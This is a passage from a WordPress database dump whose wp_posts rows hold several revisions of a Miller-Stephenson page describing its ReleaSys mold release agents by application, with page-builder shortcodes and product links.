multiple releases, critical tooling protection, and no transfer with only a single application. No time-consuming mold priming or sealing required. Whether you are doing hand layup, spray layup, filament winding, etc <b>ReleaSys™</b> has a cost-effective, efficient solution for you.</p>\n[button text="ReleaSys™ 9900" link="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/" target="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4391"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Pre-Cast / Reinforced Concrete</h2>\n<p>Miller-Stephenson has a developed a high-performance concrete release agent specifically designed for release of complex, challenging concrete mold designs. Our product minimizes/eliminates "bug-holes", provides high surface quality, consistent color pigmentation, and accurate replication of natural stone patterns. Most importantly, <b>ReleaSys™ CR </b> achieves all of this in a highly efficient and cost-effective system..</p>\n[button text="ReleaSys™ CR" link="https://www.miller-stephenson.com/product/concrete-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4430"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Custom Formulations</h2>\n<p>Didn\'t find your specific application? Miller-Stephenson\'s dynamic Engineering and Research Team can quickly address your application and develop a unique release agent solution.We understand that not every "off-the-shelf" product is right for each customer.Therefore we are ready and capable to develop a solution for you. Simple click on the button below and submit your request</p>\n[button text="Product InQuiry" link="https://www.miller-stephenson.com/tech-support/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n\n[/section]', 'Choosing ReleaSys™ By Application', '', 'inherit', 'closed', 'closed', '', '4321-revision-v1', '', '', '2017-06-08 16:36:16', '2017-06-08 16:36:16', '', 4321, 'https://www.miller-stephenson.com/4321-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4511, 0, '2017-06-08 16:40:33', '2017-06-08 16:40:33', '', '', '', 'publish', 'closed', 'closed', '', '4511', '', '', '2017-06-08 16:40:34', '2017-06-08 16:40:34', '', 0, 'https://www.miller-stephenson.com/nf_sub/4511/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4512, 3, '2017-06-08 18:04:26', '2017-06-08 18:04:26', 'Urethane mold release agent', 'ReleaSys 8900 Urethane Mold Release', '', 'inherit', 'closed', 'closed', '', 'releasys-8900-5', '', '', '2017-06-08 18:05:03', '2017-06-08 18:05:03', '', 310, 'https://www.miller-stephenson.com/wp-content/uploads/2016/08/ReleaSys-8900-2.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (4513, 2, '2017-06-08 18:07:16', '2017-06-08 18:07:16', '[section label="Media Left Large" bg_color="rgb(247, 247, 247)" bg_overlay="rgba(255, 255, 255, 0.85)" padding="0px"]\r\n\r\n[ux_banner height="400px" bg="4180" bg_overlay="rgba(0, 0, 0, 0.2)"]\r\n\r\n[text_box text_color="dark" hover="fade-out" width="36" scale="79" padding="5px 30px 10px 30px" position_x="95" position_y="95" bg="rgba(255, 255, 255, 0.94)" depth="4"]\r\n\r\nMiller-Stephenson’s exclusive mold release product line, <strong>ReleaSys™</strong>, offers advanced chemistry and modern, eco-friendly formulations for the molding industry. Our products deliver superior value through their combination of innovative technology, ease of application and exceptional cost-effectiveness. However, it is not always easy for engineers and plant managers to know which grade of <strong>ReleaSys™</strong> would perform best in their manufacturing operation. To help aid our customers we have simplified the selection process by consolidating our products into application-specific sections below.\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n[divider align="center" width="500px"]\r\n\r\n[button text="ADVANCED COMPOSITES" target=""Modern composites and fiber-reinforced materials""]\r\n\r\n[button text="ROTATIONAL PLASTIC"]\r\n\r\n[button text="POLYURETHANE"]\r\n\r\n[button text="RUBBER-SILICONE-ELASTOMER"]\r\n\r\n[button text="INJECTION PLASTICS"]\r\n\r\n[button text="FIBERGLASS"]\r\n\r\n[button text="PRECAST / REINFORCED CONCRETE"]\r\n\r\n[button text="CUSTOM FORMULATIONS"]\r\n\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4351" image_size="medium"]\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n<h2>Advanced Composites</h2>\r\nModern composites and fiber-reinforced materials demand innovative, efficient mold release solutions. Products for this application need to, adhere strongly to the mold surface, cure quickly and provide multiple releases per application with no contaminating transfer. <b>ReleaSys™ </b> technology provides a simple, yet sophisticated mold release chemistry for operators to employ. Application of only a single-coat of ReleaSys is required, no sealers or primers required.\r\n\r\n[button text="ReleaSys™ 8900" link="https://www.miller-stephenson.com/product/urethane-mold-release-agent/" target="https://www.miller-stephenson.com/product/urethane-mold-release-agent/"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4360" image_size="medium"]\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n<h2>Rotational Plastics (Rotomolding)</h2>\r\nRotational Molding is a dynamic industry which utilizes an ever-widening variety of thermoplastic resins. In response to this evolution, Miller-Stephenson has developed a robust portfolio of specialized release agents. These formulations are tailored to meet rotational molding efficiency challenges such as shorter, hotter cycles and tight-tolereance, complex molds. Our <b>ReleaSys™ </b> product line binds strongly to the mold surface ensuring no transfer, impeccable surface finish, and multiple releases per application\r\n\r\n[button text="ReleaSys™ RM" link="https://www.miller-stephenson.com/product/rotational-molding-release-agent/"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4366" image_size="medium"]\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n<h2>Polyurethane-TPU</h2>\r\nMiller-Stephenson understands the demands of the polyurethane molding industry. The numerous variants of polyurethane(High Resiliency, Visco-Elastic, Spray Skin, Rigid and Flexible Foam, etc) make the demands on a release agent very high. Miller-Stephenson’s <b>ReleaSys™</b> release systems are specially formulated to deliver superior part release, cleaner molds, reduced build up, excellent surface cosmetics, and less downtime. Our high performance chemistry adheres tenaciously to mold surfaces such as aluminium, steel, urethane, epoxy, and fiberglass. ReleaSys provides the critical protection to your mold surface while delivering highly effective release properties.\r\n\r\n[button text="ReleaSys™ 8800" link="https://www.miller-stephenson.com/product/composite-mold-release-agent/" target="https://www.miller-stephenson.com/product/composite-mold-release-agent/"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4387" image_size="medium"]\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n<h2>Rubber / Silicone / Elastomers</h2>\r\nFrom Fluorosilicones to EPDM, Natural Rubber to Nitrile, and Miller-Stephenson has been delivering unmatched release performance to molders for over 50 years. Whether you are performing injection, compression or transfer molding, Miller-Stephenson’s <b>ReleaSys™</b> product line delivers ease of demolding, non-transferring, and numerous releases per application. Much of our advanced chemistry is water-based, low or no VOC, and low odor. Miller-Stephenson is dedicated to providing a cost-effective and efficient mold release for your application.\r\n\r\n[button text="ReleaSys™ 8200" link="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/" target="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4332" image_size="medium"]\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n<h2>Injection Plastics Mold Release</h2>\r\nThere are numerous resins used in plastic injection molding,but regardless of the substrate, critical performance criteria exist for all mold release: Tenacious surface adhesion, protection of the mold surfaces, and superior part quality.Our <b>ReleaSys™</b> product line binds-to and protects even the most complex, highly polished molds, provides optimizes resin flow and generates higher part quality and lower scrap rates.\r\n\r\n[button text="ReleaSys™ 9800" link="https://www.miller-stephenson.com/product/mold-release-coating/" target="https://www.miller-stephenson.com/product/mold-release-coating/"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4337" image_size="medium"]\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n<h2>Fiberglass Mold Release</h2>\r\nMiller-Stephenson delivers the most durable, highest performing mold release agents to the aerospace and fiberglass industries. Our products provide multiple releases, critical tooling protection, and no transfer with only a single application. No time-consuming mold priming or sealing required. Whether you are doing hand layup, spray layup, filament winding, etc <b>ReleaSys™</b> has a cost-effective, efficient solution for you.\r\n\r\n[button text="ReleaSys™ 9900" link="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/" target="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4391"]\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n<h2>Pre-Cast / Reinforced Concrete</h2>\r\nMiller-Stephenson has a developed a high-performance concrete release agent specifically designed for release of complex, challenging concrete mold designs. Our product minimizes/eliminates "bug-holes", provides high surface quality, consistent color pigmentation, and accurate replication of natural stone patterns. Most importantly, <b>ReleaSys™ CR </b> achieves all of this in a highly efficient and cost-effective system..\r\n\r\n[button text="ReleaSys™ CR" link="https://www.miller-stephenson.com/product/concrete-release-agent/"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4430"]\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n<h2>Custom Formulations</h2>\r\nDidn\'t find your specific application? Miller-Stephenson\'s dynamic Engineering and Research Team can quickly address your application and develop a unique release agent solution.We understand that not every "off-the-shelf" product is right for each customer.Therefore we are ready and capable to develop a solution for you. Simple click on the button below and submit your request\r\n\r\n[button text="Product InQuiry" link="https://www.miller-stephenson.com/tech-support/"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[/section]', 'Choosing ReleaSys™ By Application', '', 'inherit', 'closed', 'closed', '', '4321-revision-v1', '', '', '2017-06-08 18:07:16', '2017-06-08 18:07:16', '', 4321, 'https://www.miller-stephenson.com/4321-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4514, 2, '2017-06-08 18:10:38', '2017-06-08 18:10:38', '[section label="Media Left Large" bg_color="rgb(247, 247, 247)" bg_overlay="rgba(255, 255, 255, 0.85)" padding="0px"]\r\n\r\n[ux_banner height="400px" bg="4180" bg_overlay="rgba(0, 0, 0, 0.2)"]\r\n\r\n[text_box text_color="dark" hover="fade-out" width="36" scale="79" padding="5px 30px 10px 30px" position_x="95" position_y="95" bg="rgba(255, 255, 255, 0.94)" depth="4"]\r\n\r\nMiller-Stephenson’s exclusive mold release product line, <strong>ReleaSys™</strong>, offers advanced chemistry and modern, eco-friendly formulations for the molding industry. Our products deliver superior value through their combination of innovative technology, ease of application and exceptional cost-effectiveness. However, it is not always easy for engineers and plant managers to know which grade of <strong>ReleaSys™</strong> would perform best in their manufacturing operation. To help aid our customers we have simplified the selection process by consolidating our products into application-specific sections below.\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n[divider align="center" width="500px"]\r\n\r\n[button text="ADVANCED COMPOSITES"]\r\n\r\n[button text="ROTATIONAL PLASTIC"]\r\n\r\n[button text="POLYURETHANE"]\r\n\r\n[button text="RUBBER-SILICONE-ELASTOMER"]\r\n\r\n[button text="INJECTION PLASTICS"]\r\n\r\n[button text="FIBERGLASS"]\r\n\r\n[button text="PRECAST / REINFORCED CONCRETE"]\r\n\r\n[button text="CUSTOM FORMULATIONS"]\r\n\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4351" image_size="medium"]\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n<a name="advanced composites"></a>\r\n<h2>Advanced Composites</h2>\r\nModern composites and fiber-reinforced materials demand innovative, efficient mold release solutions. Products for this application need to, adhere strongly to the mold surface, cure quickly and provide multiple releases per application with no contaminating transfer. <b>ReleaSys™ </b> technology provides a simple, yet sophisticated mold release chemistry for operators to employ. Application of only a single-coat of ReleaSys is required, no sealers or primers required.\r\n\r\n[button text="ReleaSys™ 8900" link="https://www.miller-stephenson.com/product/urethane-mold-release-agent/" target="https://www.miller-stephenson.com/product/urethane-mold-release-agent/"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4360" image_size="medium"]\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n<h2>Rotational Plastics (Rotomolding)</h2>\r\nRotational Molding is a dynamic industry which utilizes an ever-widening variety of thermoplastic resins. In response to this evolution, Miller-Stephenson has developed a robust portfolio of specialized release agents. These formulations are tailored to meet rotational molding efficiency challenges such as shorter, hotter cycles and tight-tolereance, complex molds. Our <b>ReleaSys™ </b> product line binds strongly to the mold surface ensuring no transfer, impeccable surface finish, and multiple releases per application\r\n\r\n[button text="ReleaSys™ RM" link="https://www.miller-stephenson.com/product/rotational-molding-release-agent/"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4366" image_size="medium"]\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n<h2>Polyurethane-TPU</h2>\r\nMiller-Stephenson understands the demands of the polyurethane molding industry. The numerous variants of polyurethane(High Resiliency, Visco-Elastic, Spray Skin, Rigid and Flexible Foam, etc) make the demands on a release agent very high. Miller-Stephenson’s <b>ReleaSys™</b> release systems are specially formulated to deliver superior part release, cleaner molds, reduced build up, excellent surface cosmetics, and less downtime. Our high performance chemistry adheres tenaciously to mold surfaces such as aluminium, steel, urethane, epoxy, and fiberglass. ReleaSys provides the critical protection to your mold surface while delivering highly effective release properties.\r\n\r\n[button text="ReleaSys™ 8800" link="https://www.miller-stephenson.com/product/composite-mold-release-agent/" target="https://www.miller-stephenson.com/product/composite-mold-release-agent/"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4387" image_size="medium"]\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n<h2>Rubber / Silicone / Elastomers</h2>\r\nFrom Fluorosilicones to EPDM, Natural Rubber to Nitrile, and Miller-Stephenson has been delivering unmatched release performance to molders for over 50 years. Whether you are performing injection, compression or transfer molding, Miller-Stephenson’s <b>ReleaSys™</b> product line delivers ease of demolding, non-transferring, and numerous releases per application. Much of our advanced chemistry is water-based, low or no VOC, and low odor. Miller-Stephenson is dedicated to providing a cost-effective and efficient mold release for your application.\r\n\r\n[button text="ReleaSys™ 8200" link="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/" target="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4332" image_size="medium"]\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n<h2>Injection Plastics Mold Release</h2>\r\nThere are numerous resins used in plastic injection molding,but regardless of the substrate, critical performance criteria exist for all mold release: Tenacious surface adhesion, protection of the mold surfaces, and superior part quality.Our <b>ReleaSys™</b> product line binds-to and protects even the most complex, highly polished molds, provides optimizes resin flow and generates higher part quality and lower scrap rates.\r\n\r\n[button text="ReleaSys™ 9800" link="https://www.miller-stephenson.com/product/mold-release-coating/" target="https://www.miller-stephenson.com/product/mold-release-coating/"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4337" image_size="medium"]\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n<h2>Fiberglass Mold Release</h2>\r\nMiller-Stephenson delivers the most durable, highest performing mold release agents to the aerospace and fiberglass industries. Our products provide multiple releases, critical tooling protection, and no transfer with only a single application. No time-consuming mold priming or sealing required. Whether you are doing hand layup, spray layup, filament winding, etc <b>ReleaSys™</b> has a cost-effective, efficient solution for you.\r\n\r\n[button text="ReleaSys™ 9900" link="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/" target="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4391"]\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n<h2>Pre-Cast / Reinforced Concrete</h2>\r\nMiller-Stephenson has a developed a high-performance concrete release agent specifically designed for release of complex, challenging concrete mold designs. Our product minimizes/eliminates "bug-holes", provides high surface quality, consistent color pigmentation, and accurate replication of natural stone patterns. Most importantly, <b>ReleaSys™ CR </b> achieves all of this in a highly efficient and cost-effective system..\r\n\r\n[button text="ReleaSys™ CR" link="https://www.miller-stephenson.com/product/concrete-release-agent/"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4430"]\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n<h2>Custom Formulations</h2>\r\nDidn\'t find your specific application? Miller-Stephenson\'s dynamic Engineering and Research Team can quickly address your application and develop a unique release agent solution.We understand that not every "off-the-shelf" product is right for each customer.Therefore we are ready and capable to develop a solution for you. Simple click on the button below and submit your request\r\n\r\n[button text="Product InQuiry" link="https://www.miller-stephenson.com/tech-support/"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[/section]', 'Choosing ReleaSys™ By Application', '', 'inherit', 'closed', 'closed', '', '4321-revision-v1', '', '', '2017-06-08 18:10:38', '2017-06-08 18:10:38', '', 4321, 'https://www.miller-stephenson.com/4321-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4515, 2, '2017-06-08 18:11:29', '2017-06-08 18:11:29', '[section label="Media Left Large" bg_color="rgb(247, 247, 247)" bg_overlay="rgba(255, 255, 255, 0.85)" padding="0px"]\n\n[ux_banner height="400px" bg="4180" bg_overlay="rgba(0, 0, 0, 0.2)"]\n\n[text_box text_color="dark" hover="fade-out" width="36" scale="79" padding="5px 30px 10px 30px" position_x="95" position_y="95" bg="rgba(255, 255, 255, 0.94)" depth="4"]\n\n<p>Miller-Stephenson’s exclusive mold release product line, <strong>ReleaSys™</strong>, offers advanced chemistry and modern, eco-friendly formulations for the molding industry. Our products deliver superior value through their combination of innovative technology, ease of application and exceptional cost-effectiveness. However, it is not always easy for engineers and plant managers to know which grade of <strong>ReleaSys™</strong> would perform best in their manufacturing operation. To help aid our customers we have simplified the selection process by consolidating our products into application-specific sections below.</p>\n\n[/text_box]\n\n[/ux_banner]\n[divider align="center" width="500px"]\n\n[button text="ADVANCED COMPOSITES" link="#advanced composites"]\n\n[button text="ROTATIONAL PLASTIC"]\n\n[button text="POLYURETHANE"]\n\n[button text="RUBBER-SILICONE-ELASTOMER"]\n\n[button text="INJECTION PLASTICS"]\n\n[button text="FIBERGLASS"]\n\n[button text="PRECAST / REINFORCED CONCRETE"]\n\n[button text="CUSTOM FORMULATIONS"]\n\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4351" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<p><a name="advanced composites"></a></p>\n<h2>Advanced Composites</h2>\n<p>Modern composites and fiber-reinforced materials demand innovative, efficient mold release solutions. Products for this application need to, adhere strongly to the mold surface, cure quickly and provide multiple releases per application with no contaminating transfer. <b>ReleaSys™ </b> technology provides a simple, yet sophisticated mold release chemistry for operators to employ. Application of only a single-coat of ReleaSys is required, no sealers or primers required.</p>\n[button text="ReleaSys™ 8900" link="https://www.miller-stephenson.com/product/urethane-mold-release-agent/" target="https://www.miller-stephenson.com/product/urethane-mold-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4360" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Rotational Plastics (Rotomolding)</h2>\n<p>Rotational Molding is a dynamic industry which utilizes an ever-widening variety of thermoplastic resins. In response to this evolution, Miller-Stephenson has developed a robust portfolio of specialized release agents. These formulations are tailored to meet rotational molding efficiency challenges such as shorter, hotter cycles and tight-tolereance, complex molds. Our <b>ReleaSys™ </b> product line binds strongly to the mold surface ensuring no transfer, impeccable surface finish, and multiple releases per application</p>\n[button text="ReleaSys™ RM" link="https://www.miller-stephenson.com/product/rotational-molding-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4366" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Polyurethane-TPU</h2>\n<p>Miller-Stephenson understands the demands of the polyurethane molding industry. The numerous variants of polyurethane(High Resiliency, Visco-Elastic, Spray Skin, Rigid and Flexible Foam, etc) make the demands on a release agent very high. Miller-Stephenson’s <b>ReleaSys™</b> release systems are specially formulated to deliver superior part release, cleaner molds, reduced build up, excellent surface cosmetics, and less downtime. Our high performance chemistry adheres tenaciously to mold surfaces such as aluminium, steel, urethane, epoxy, and fiberglass. ReleaSys provides the critical protection to your mold surface while delivering highly effective release properties.</p>\n[button text="ReleaSys™ 8800" link="https://www.miller-stephenson.com/product/composite-mold-release-agent/" target="https://www.miller-stephenson.com/product/composite-mold-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4387" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Rubber / Silicone / Elastomers</h2>\n<p>From Fluorosilicones to EPDM, Natural Rubber to Nitrile, and Miller-Stephenson has been delivering unmatched release performance to molders for over 50 years. Whether you are performing injection, compression or transfer molding, Miller-Stephenson’s <b>ReleaSys™</b> product line delivers ease of demolding, non-transferring, and numerous releases per application. Much of our advanced chemistry is water-based, low or no VOC, and low odor. Miller-Stephenson is dedicated to providing a cost-effective and efficient mold release for your application.</p>\n[button text="ReleaSys™ 8200" link="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/" target="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4332" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Injection Plastics Mold Release</h2>\n<p>There are numerous resins used in plastic injection molding,but regardless of the substrate, critical performance criteria exist for all mold release: Tenacious surface adhesion, protection of the mold surfaces, and superior part quality.Our <b>ReleaSys™</b> product line binds-to and protects even the most complex, highly polished molds, provides optimizes resin flow and generates higher part quality and lower scrap rates.</p>\n[button text="ReleaSys™ 9800" link="https://www.miller-stephenson.com/product/mold-release-coating/" target="https://www.miller-stephenson.com/product/mold-release-coating/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4337" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Fiberglass Mold Release</h2>\n<p>Miller-Stephenson delivers the most durable, highest performing mold release agents to the aerospace and fiberglass industries. Our products provide multiple releases, critical tooling protection, and no transfer with only a single application. No time-consuming mold priming or sealing required. Whether you are doing hand layup, spray layup, filament winding, etc <b>ReleaSys™</b> has a cost-effective, efficient solution for you.</p>\n[button text="ReleaSys™ 9900" link="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/" target="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4391"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Pre-Cast / Reinforced Concrete</h2>\n<p>Miller-Stephenson has a developed a high-performance concrete release agent specifically designed for release of complex, challenging concrete mold designs. Our product minimizes/eliminates "bug-holes", provides high surface quality, consistent color pigmentation, and accurate replication of natural stone patterns. Most importantly, <b>ReleaSys™ CR </b> achieves all of this in a highly efficient and cost-effective system..</p>\n[button text="ReleaSys™ CR" link="https://www.miller-stephenson.com/product/concrete-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4430"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Custom Formulations</h2>\n<p>Didn\'t find your specific application? Miller-Stephenson\'s dynamic Engineering and Research Team can quickly address your application and develop a unique release agent solution.We understand that not every "off-the-shelf" product is right for each customer.Therefore we are ready and capable to develop a solution for you. Simple click on the button below and submit your request</p>\n[button text="Product InQuiry" link="https://www.miller-stephenson.com/tech-support/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n\n[/section]', 'Choosing ReleaSys™ By Application', '', 'inherit', 'closed', 'closed', '', '4321-revision-v1', '', '', '2017-06-08 18:11:29', '2017-06-08 18:11:29', '', 4321, 'https://www.miller-stephenson.com/4321-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4516, 2, '2017-06-08 18:13:10', '2017-06-08 18:13:10', '[section label="Media Left Large" bg_color="rgb(247, 247, 247)" bg_overlay="rgba(255, 255, 255, 0.85)" padding="0px"]\r\n\r\n[ux_banner height="400px" bg="4180" bg_overlay="rgba(0, 0, 0, 0.2)"]\r\n\r\n[text_box text_color="dark" hover="fade-out" width="36" scale="79" padding="5px 30px 10px 30px" position_x="95" position_y="95" bg="rgba(255, 255, 255, 0.94)" depth="4"]\r\n\r\n<p>Miller-Stephenson’s exclusive mold release product line, <strong>ReleaSys™</strong>, offers advanced chemistry and modern, eco-friendly formulations for the molding industry. Our products deliver superior value through their combination of innovative technology, ease of application and exceptional cost-effectiveness. However, it is not always easy for engineers and plant managers to know which grade of <strong>ReleaSys™</strong> would perform best in their manufacturing operation. To help aid our customers we have simplified the selection process by consolidating our products into application-specific sections below.</p>\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n[divider align="center" width="500px"]\r\n\r\n[button text="ADVANCED COMPOSITES" link="#advanced composites"]\r\n\r\n[button text="ROTATIONAL PLASTIC"]\r\n\r\n[button text="POLYURETHANE"]\r\n\r\n[button text="RUBBER-SILICONE-ELASTOMER"]\r\n\r\n[button text="INJECTION 